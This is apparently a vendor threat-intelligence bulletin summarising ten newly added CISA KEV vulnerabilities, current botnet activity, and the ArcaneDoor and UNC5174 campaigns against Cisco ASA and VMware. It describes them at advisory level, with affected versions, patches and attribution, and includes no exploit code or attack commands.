This week, the CISA Known Exploited Vulnerabilities (KEV) catalog received a major update with 10 new entries spanning a wide range of vendors, including GNU, Jenkins, Juniper, Samsung, Smartbedded, Sudo, Libraesva, Fortra, Cisco, and Adminer. The additions feature a mix of freshly discovered zero-days and older, long-standing vulnerabilities, with four historical flaws resurfacing in critical deployments.

Botnet activity continues to surge: EnemyBot, Sysrv-k, Andoryu, and Androxgh0st are actively exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications, while IoT-focused botnets such as Mirai, Bashlite, Tsunami, and BrickerBot are intensifying attacks on EirD1000 routers, aiming for persistence and lateral network movement.  

On the advanced threat front, UNC5174 conducted in-the-wild attacks exploiting a VMware guest-service discovery flaw to escalate privileges on virtual machines, while the ArcaneDoor cluster (UAT4356/Storm‑1849) launched a sophisticated campaign against Cisco ASA 5500‑X appliances, deploying the RayInitiator bootkit and LINE VIPER loader to achieve stealthy, long-term persistence.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-4008
A Command Injection Vulnerability in the Smartbedded Meteobridge, a weather station gateway solution, that could allow remote unauthenticated attackers to execute arbitrary commands with root privileges on affected devices. Rated CVSS 8.7 (High), the flaw impacts versions up to and including 6.1 and has been patched in version 6.2. The issue was discovered by OneKey, which also released proof of concept demonstrating its exploitability. Given the risk of full device compromise, the vulnerability has been recently added to the CISA KEV catalog.

CVE-2025-10035
A Deserialization of Untrusted Data Vulnerability in the License servlet of Fortra's GoAnywhere MFT, which allows an attacker to achieve unauthenticated remote code execution. Rated with a critical CVSS Score of 10.0, this flaw stems from improper handling of license-response signatures, where a forged response can deserialize attacker-controlled objects, potentially leading to command injection and full system compromise. Fortra has issued patches, fixing the issue in GoAnywhere MFT version 7.8.4 and the Sustain Release 7.6.3. GoAnywhere MFT is a widely adopted managed file transfer solution, deployed on-premises, in the cloud, and in hybrid environments for secure large-scale file exchanges. While the vulnerability can be exploited remotely without user interaction, exploitation requires access to the administrative console, making instances exposed to the internet most at risk, whereas internally restricted deployments face lower exposure. This critical flaw has also been added to the CISA KEV catalog.

CVE-2025-20352
A Denial of Service(DoS) and Remote Code Execution Vulnerability has been discovered in the Cisco IOS and IOS XE software, arising from a stack overflow condition within the SNMP subsystem. Successful exploitation could allow a low-privileged attacker to trigger a system reload, causing a DoS, or enable a high-privileged attacker to execute arbitrary code as root, effectively taking full control of the device. The flaw impacts all versions of SNMP and is rated high in severity. While Cisco has released software updates along with mitigation guidance, no direct workarounds are available. Cisco PSIRT has confirmed that the vulnerability has been actively exploited in the wild, with attackers using compromised local Administrator credentials to target vulnerable systems. The issue has also been recently added to the CISA KEV catalog.

CVE-2025-21043
An Out-of-Bounds Write Vulnerability has been identified in Samsung’s libimagecodec.quram.so component, which could allow remote attackers to execute arbitrary code. Rated CVSS 8.8 (High), the flaw impacts Samsung mobile devices running versions prior to SMR September 2025 Release 1 and has been patched in Samsung’s September 2025 Android security updates. The issue stems from an incorrect implementation in the closed-source image parsing library developed by Quramsoft, which can be exploited via maliciously crafted images. Samsung confirmed that the vulnerability was already being exploited in the wild at the time of disclosure, though details of the active campaigns remain undisclosed. The flaw has since been added to the CISA KEV catalog.

CVE-2025-32463
An Inclusion of Functionality from Untrusted Control Sphere Vulnerability has been identified in Sudo, a privileged command-line utility on Unix/Linux systems that allows permitted users to run commands as the superuser while maintaining an audit trail. Rated CVSS 9.3 (Critical) and affecting versions 1.9.14 through 1.9.17, the flaw was discovered by the Stratascale Cyber Research Unit (CRU) and stems from misuse of Sudo’s -R (--chroot) feature. When a writable chroot directory is specified, Sudo performs chroot()/pivot_root() calls and triggers NSS lookups that cause the system to load /etc/nsswitch.conf from the untrusted environment, allowing attackers to inject a malicious shared library and execute arbitrary code as root. The issue has been fixed in Sudo version 1.9.17p1, where the chroot feature has been deprecated, and the vulnerability has been added to the CISA KEV catalog due to its high exploitation risk.

CVE-2025-59689
A Command Injection Vulnerability in the Libraesva Email Security Gateway (ESG) allows attackers to execute arbitrary shell commands via a specially compressed email attachment. The flaw results from improper sanitization of certain archive formats, letting malicious file bypass input validation and inject commands. It affects versions 4.5 through 5.5x prior to 5.5.7. Successful exploitation runs commands under a non-privileged account, which attackers can leverage for persistence, lateral movement, or privilege escalation. Libraesva confirmed the vulnerability was abused in a targeted incident likely by a foreign hostile actor against a single appliance rather than as part of a broad financial crime campaign. This vulnerability has been recently added to the CISA KEV catalog.

CVE-2021-21311
A Server-Side Request Forgery (SSRF) Vulnerability in Adminer, an open-source database management tool distributed as a single PHP file. The flaw, present in versions 4.0.0 through 4.7.8, stems from improper error page handling in the Elasticsearch and ClickHouse drivers, enabling remote attackers to initiate SSRF attacks and potentially gain access to sensitive information. The issue primarily impacts deployments using the bundled package with all drivers, particularly the adminer.php file. Originally disclosed in February 2021 and fixed in version 4.7.9, the vulnerability has recently been added to the CISA KEV catalog, underscoring its continued risk to unpatched systems and the urgent need for organizations to update affected instances.

CVE-2017-1000353
A Remote Code Execution in Jenkins allowed unauthenticated attackers to exploit the remoting-based Jenkins CLI y transferring a serialized Java SignedObject, which was deserialized using a new ObjectInputStream, effectively bypassing the blocklist-based protection mechanism. This critical flaw affected Jenkins versions 2.56 and as well as 2.46.1 LTS and earlier, enabling attackers to achieve arbitrary remote code execution. To mitigate the issue, the Jenkins team added SignedObject to the blocklist, deprecated the vulnerable remoting-based CLI protocol (disabling it by default), and backported the safer HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2. The vulnerability was fixed in Jenkins 2.57 and 2.46.2 LTS, released in 2017. Despite the patch being available for years, this RCE has recently been added to the CISA KEV catalog, highlighting its continued risk.  

CVE-2015-7755
An Improper Authentication Vulnerability in Juniper ScreenOS allowed attackers to bypass administrative authentication by using a hardcoded backdoor password via SSH or Telnet sessions, granting full remote access to affected Netscreen firewalls. Disclosed in December 2015, Juniper revealed that unauthorized code had been inserted into ScreenOS, introducing both an authentication bypass and a VPN backdoor that enabled passive traffic decryption. Researchers quickly identified the hardcoded password, and scans showed nearly 26,000 internet-facing devices were exposed at that time. Affected versions included 6.3.0r17 through 6.3.0r20, with Juniper issuing rebuilt firmware packages (marked with a “b” suffix) and new versions to remove the malicious code. Although patched in 2015, this critical flaw, with a publicly available proof-of-concept, has since been added to the CISA KEV catalog.

CVE-2014-6278
An OS Command Injection Vulnerability in GNU Bash (commonly known as Shellshock) allowed remote attackers to execute arbitrary commands through crafted environment variables. The flaw, present in GNU Bash through version 4.3 bash43-026, stemmed from improper parsing of function definitions in environment variable values, enabling exploitation in scenarios such as OpenSSH’s ForceCommand, Apache HTTP Server’s mod_cgi and mod_cgid modules, and DHCP client scripts where environment variables cross privilege boundaries. This issue existed due to incomplete fixes for earlier vulnerabilities (CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277) and was one of the most widely exploited bugs of its time. Now, more than a decade later, it has been added to the CISA KEV catalog, underscoring its long-standing security impact.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-20333 and CVE-2025-20362
The U.K. NCSC and Cisco reported a sophisticated campaign, linked to the ArcaneDoor cluster and suspected China-linked actor UAT4356 (aka Storm-1849) - that exploited zero-day flaws, notably CVE-2025-20362 and CVE-2025-20333 in ASA 5500-X appliances to bypass authentication and run malicious code. Forensic analysis uncovered a persistent GRUB-style bootkit called RayInitiator, which reflashes devices to survive reboots and firmware upgrades, and a user-mode loader LINE VIPER that executes within the ASA lina process to run CLI commands, capture packets, suppress logs, and maintain stealthy C2. In some cases attackers modified ROMMON on ASA 5500-X models lacking Secure Boot/Trust Anchor, enabling long-term persistence; many affected models are end-of-support or near EoS. Cisco also fixed a third critical flaw; CVE-2025-20363 across ASA/FTD/IOS variants (no evidence of exploitation yet), and agencies have urged immediate updates to fixed releases to mitigate the threat.  

CVE-2025-41244
Nviso Labs has attributed the active exploitation of CVE-2025-41244 vulnerability to UNC5174, a suspected Chinese state‑sponsored threat actor with a history of using publicly known exploits for initial access. However, researchers caution that, due to the simplicity of the exploit and common malware practices of naming binaries after system executables (e.g., httpd), it remains unclear whether UNC5174 deliberately exploited the vulnerability or if other malware has unintentionally leveraged this privilege escalation over time.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/09/29/cisa-adds-five-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/10/02/cisa-adds-five-known-exploited-vulnerabilities-catalog  
3. https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/  
4. https://www.ncsc.gov.uk/news/persistent-malicious-targeting-cisco-devices  
5. https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks‍